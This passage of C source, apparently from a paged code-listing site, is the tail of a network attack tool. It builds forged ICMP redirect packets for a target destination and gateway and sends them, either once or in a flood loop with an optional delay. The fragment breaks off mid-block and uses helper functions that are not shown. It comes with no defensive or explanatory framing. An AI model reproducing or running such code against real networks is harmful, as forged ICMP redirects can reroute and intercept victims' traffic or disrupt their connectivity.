br> if (cfg.flood) { while (!stop_flag) { icp=construct_icmp_redirect(&(cfg.dest),&(cfg.gw),&icl); sendpack_IP4(icmpsfd,icp,icl); free(icp); if (cfg.delay>0) usleep(cfg.delay); } } else { icp=construct_icmp_redirect(&(cfg.dest),&(cfg.gw),&icl); sendpack_IP4(icmpsfd,icp,icl); free(icp);
数据载入中...
页码:[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] 第10页、共10页 |